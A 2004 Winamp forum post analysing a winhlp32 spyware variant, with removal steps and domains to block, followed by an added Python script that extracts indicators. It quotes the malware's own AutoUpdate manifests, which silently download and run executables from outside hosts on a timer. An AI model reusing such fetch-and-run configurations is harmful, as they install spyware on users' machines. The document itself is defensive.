Old 22nd May 2004, 13:07   #41
DJ Egg
Techorator
Winamp & SHOUTcast Team
 
Join Date: Jun 2000
Posts: 35,821
Yes! Yay! woohoo

/me takes a bow


Thanks for the zip punkcrib.
Hmm... very interesting.
I'll be passing this useful info on to the SpybotSD and Adaware people.

Yup, it's also replacing the default Winhlp32.exe (Windows Help) file with a version of its own.
So you'll need to restore the original from the WinXP CD, or there may be a good version of it that you can copy over from one of these folders:
C:\WINDOWS\ServicePackFiles\i386
C:\WINDOWS\$NtServicePackUninstall$
Note that the correct filesize for the legitimate Winhlp32.exe file in the Windows dir is 277kb (WinXP sp2) or 261kb (WinXP sp1). The legit version has a yellow question mark icon.


winhlp32.dll = Free Community Toolbar malware
also known as easytoolbar or Lizard Bar foistware/browser hijacker.
This however appears to be a new variant.


So, make sure you end process in Task Manager
for all instances of Winhlp32.dll / Winhlp32.dll.exe / Winhlp32.exe
and then delete the offending files
(naturally, also making sure that the relevant HKLM/..Run
startup entries are disabled first, using HJT or msconfig).

Winhlp32.* is the file which is sabotaging Winamp.
It hooks and then sends WM_USER+2 messages to every window in the system.
WM_USER+2 in Winamp = WM_MPEG_EOF
which is the message sent by the decoder thread to tell the song has ended.


The "get_xml.php.user" file provides some useful info:

code:

<AutoUpdate>
<Task name="task1" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://easytoolbar.com/vvsn" filename="VVSN_MKTE0404Inst.exe" localpath="%" />
<File url="http://easytoolbar.com/vvsn" filename="OMPInst.exe" localpath="%" run="yes" />
<Get key="HKEY_LOCAL_MACHINE\SOFTWARE\WhenUSave\Partners\SYNC\Partner"
url="http://easytoolbar.com/update/storeval.php?val=%val&amp;get_id=1&amp;uid=%uid"/>
</Task>
<Task name="storesearch" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://www.easytoolbar.com/update/storesearch" filename="winhlp32.dll" localpath="%" run="yes" />
</Task>

</AutoUpdate>



And the crux of the issue comes from "autoupdate.xml".
Here's where winhlp32.* is coming from, loading on a timer.
Also note that the url is still active,
proving that mp3university.com is the source of this evil!

code:
<AutoUpdate>
<Task name="self" showprocess="no" type="version" version="2.0.0.0" >
<File url="http://mp3university.com/winhlp32.exe"
filename="winhlp32.exe" run="yes" install="yes" localpath="" />
</Task>

<Settings>
<TimePeriodTimeBased type="hour" value="1"/>
<TimePeriodUpdateXml type="hour" value="12"/>
</Settings>

</AutoUpdate>



So, it's also installing Easytoolbar and WhenUSave spyware.
Hopefully SpybotSD or Adaware have already removed these files,
but if not, I suggest you root out and delete all of:

VVSN_MKTE0404Inst.exe
OMPInst.exe
winhlp32.dll
winhlp32.dll.exe
updater.exe
autoupdate.xml
get_xml.php
get_xml.php.user
winhlp32.dllalias.txt
winhlp32.dlltemp.html


The first places to look would be:
C:\Windows\System32 (WinXP)
C:\Windows\System (Win9x/ME)
C:\WinNT\System32 (Win2k)
C:\Windows\Downloaded Program Files


If the default Windows Help file has been replaced
(c:\windows\system32\winhlp32.exe)
then you will need to restore the original version from the Windows Setup CD.
In WinXP, this file has a yellow question mark icon and is 8kb.
There will also be a winhlp32.exe in the Windows dir,
with the same yellow question mark icon, size = 261kb.
There will be a backup version of this file in c:\windows\system32\dllcache.
If the filesizes don't match, and the icon is anything different to a yellow question mark
(e.g. the one in punkcrib's zip is a yellow circle with a "Z" in the middle),
then you will know that the default Help files have been replaced by these bogus malware versions.



I also strongly recommend that you add all of:

*.mp3university.com
*.easytoolbar.com
*.song-download-world.com
*.mp3downloading.com

to the Restricted Zone in Internet Explorer Options > Security.

And now would also be a good time to empty your internet cache
(Temporary Internet Files -> Delete).



Further steps you can take to protect yourselves:


Install Spywareblaster
You'll actually see a link to this in the SpybotSD > Immunize tab.

Install then run the program.
Click the Updates button
Let it install all updates
Then click "enable all protection".
You can now safely close the program.

Be sure to repeat this action at least once a week,
to make sure the detection files are up to date.

If you go to Tools > Custom Blocking,
you can manually add the following entry:

Name = winhlp32 reactivator
CLSID = {6C31790D-1EDF-4B05-83DC-925B3A8E2318}

Then checkmark it and click "protect against checked items".



Optionally, you can also install SpywareGuard
which runs permanently in the systray.


I'll be adding a link to this thread in the Troubleshooters FAQ.

Thanks again.

wOOt.


[Edit]
Ah, the link to punkcrib's zip is now dead.
I've put up a new link to it here
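An added example, not from the post or from DJ Egg: a small Python parser for the two AutoUpdate manifests quoted above, pulling out the download hosts to block, the payload filenames to hunt for, the registry key the updater reads, and the hourly timer settings. The XML strings are copied from the post; the function names (`parse_manifest`, `indicators`) are mine.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Both manifests are copied from the post above; "%" placeholders are left as found.
GET_XML_USER = r"""<AutoUpdate>
<Task name="task1" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://easytoolbar.com/vvsn" filename="VVSN_MKTE0404Inst.exe" localpath="%" />
<File url="http://easytoolbar.com/vvsn" filename="OMPInst.exe" localpath="%" run="yes" />
<Get key="HKEY_LOCAL_MACHINE\SOFTWARE\WhenUSave\Partners\SYNC\Partner"
url="http://easytoolbar.com/update/storeval.php?val=%val&amp;get_id=1&amp;uid=%uid"/>
</Task>
<Task name="storesearch" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://www.easytoolbar.com/update/storesearch" filename="winhlp32.dll" localpath="%" run="yes" />
</Task>
</AutoUpdate>"""
AUTOUPDATE_XML = r"""<AutoUpdate>
<Task name="self" showprocess="no" type="version" version="2.0.0.0" >
<File url="http://mp3university.com/winhlp32.exe"
filename="winhlp32.exe" run="yes" install="yes" localpath="" />
</Task>
<Settings>
<TimePeriodTimeBased type="hour" value="1"/>
<TimePeriodUpdateXml type="hour" value="12"/>
</Settings>
</AutoUpdate>"""

def parse_manifest(xml_text):
    """Return (files, gets, timers): payloads to fetch, registry reads, and re-run intervals."""
    root = ET.fromstring(xml_text)
    files = [{"task": t.get("name"), "url": f.get("url"), "filename": f.get("filename"),
              "run": f.get("run") == "yes", "install": f.get("install") == "yes"}
             for t in root.findall("Task") for f in t.findall("File")]
    gets = [{"key": g.get("key"), "url": g.get("url")} for g in root.iter("Get")]
    # <TimePeriod...> elements under <Settings> are the timer the post mentions (in hours).
    timers = {t.tag: (t.get("type"), int(t.get("value")))
              for t in root.iter() if t.tag.startswith("TimePeriod")}
    return files, gets, timers

def indicators(*manifests):
    """Collect hosts to block, filenames to hunt for, and registry keys touched."""
    hosts, names, keys = set(), set(), set()
    for m in manifests:
        files, gets, _ = parse_manifest(m)
        hosts.update(urlparse(x["url"]).hostname for x in files + gets)
        names.update(f["filename"].lower() for f in files)
        keys.update(g["key"] for g in gets)
    return hosts, names, keys
```

The host set is what you would feed into the Restricted Zone list or a hosts-file block, and the filename set is the hunt list for the System32 / Downloaded Program Files folders named above.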